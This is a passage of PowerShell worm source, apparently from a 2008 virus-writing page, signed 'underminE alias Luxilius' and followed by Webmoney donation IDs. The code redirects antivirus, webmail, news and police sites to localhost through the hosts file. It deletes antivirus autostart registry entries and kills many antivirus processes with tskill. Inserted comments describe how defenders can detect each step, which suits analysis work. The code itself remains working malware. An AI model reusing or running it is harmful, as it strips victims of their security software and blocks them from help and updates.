    echo "127.0.0.1 www.antiviruslab.com " >> hosts
    echo "127.0.0.1 www.search.yahoo.com " >> hosts
    echo "127.0.0.1 www.web.de " >> hosts
    echo "127.0.0.1 www.hotmail.com " >> hosts
    echo "127.0.0.1 www.hotmail.de " >> hosts
    echo "127.0.0.1 www.gmx.net " >> hosts
    echo "127.0.0.1 www.spiegel.de " >> hosts
    echo "127.0.0.1 www.icq.com " >> hosts
    echo "127.0.0.1 www.icq.de " >> hosts
    echo "127.0.0.1 www.ffh.de " >> hosts
    echo "127.0.0.1 www.lavasoft.de " >> hosts
    echo "127.0.0.1 www.de.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wikipedia.org " >> hosts
    echo "127.0.0.1 www.en.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wissen.de " >> hosts
    echo "127.0.0.1 www.virus-aktuell.de " >> hosts
    echo "127.0.0.1 www.arcor.de " >> hosts
    echo "127.0.0.1 www.t-online.de " >> hosts
    echo "127.0.0.1 www.t-com.de " >> hosts
    echo "127.0.0.1 www.alice-dsl.de " >> hosts
    echo "127.0.0.1 www.freenet.de " >> hosts
    echo "127.0.0.1 www.1und1.de " >> hosts
    echo "127.0.0.1 www.fbi.gov " >> hosts
    echo "127.0.0.1 www.polizei.de " >> hosts
    echo "127.0.0.1 www.mup.sr.gov.yu " >> hosts


    # Security-product autostart removal: each call deletes one value under
    # HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The value names appear to
    # belong to antivirus products (the header calls them "well-known Antiviruses").
    # Detection: registry auditing on deletions under the Run key, especially a
    # burst of them from a script host; product tamper protection should block or
    # report the change.
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask');
       
       
    # Security-process termination: one `tskill <name> /a` per process name. The
    # header describes this step as killing well-known anti-virus processes.
    # Detection: many tskill invocations in quick succession from one parent, or
    # any tskill/taskkill aimed at endpoint-protection process names; tamper
    # protection and protected-process settings limit the effect.
    tskill avcenter /a
    tskill avconfig /a
    tskill avscan /a
    tskill avguard /a
    tskill avgnt /a
    tskill update /a
    tskill preupd /a
    tskill avcmd /a
    tskill avesvc /a
    tskill kav /a
    tskill kavsvc /a
    tskill kavsend /a
    tskill keymanager /a
    tskill agentsvr /a
    tskill avgcc /a
    tskill avgupsvc /a
    tskill avgamsvr /a
    tskill vsserv /a
    tskill bdss /a
    tskill xcommsvr /a
    tskill bdnagent /a
    tskill bdoesrv /a
    tskill bdmcon /a
    tskill bdswitch /a
    tskill rtvr /a
    tskill bdsubmit /a
    tskill bdlite /a
    tskill agentsvr /a
    tskill tmproxy /a
    tskill PcCtlCom /a
    tskill pccguide /a
    tskill qttask /a
    tskill patch /a
    tskill Tmntsrv /a
    tskill PccPrm /a
    tskill DrWebUpW /a
    tskill spidernt /a
    tskill DrWebScd /a
    tskill DrWeb32w /a
    tskill drwadins /a
    tskill mcupdui /a
    tskill McTskshd /a
    tskill McAppIns /a
    tskill mghtml /a
    tskill McShield /a
    tskill Mcdetect /a
    tskill McVSEscn /a
    tskill oasclnt /a
    tskill mcvsshld /a


    # Final announcement: prints the four banner strings, then shows a
    # WScript.Shell popup. The popup's second argument (2) is its timeout in
    # seconds and the third is the window title. The title text
    # "PowerShell Worm by underminE alias Luxilius" is a user-visible indicator.
    echo "$strInfoString_one ";
    echo "$strInfoString_two ";
    echo "$strInfoString_three ";
    echo "$strInfoString_four ";

    $wshs.popup("www.underminE.bloger.hr - www.underminE.bloger.hr -
    www.underminE.bloger.hr | Worm ¸2008 by underminE alias Luxilius",2,"PowerShell Worm by underminE alias Luxilius");

    exit ;
    DonoR
    CURRENT MOON

    ALSO DONATE
            VX (at)

    Webmoney pursues:

    Z518898905521

    R733573362072

    share & email virus html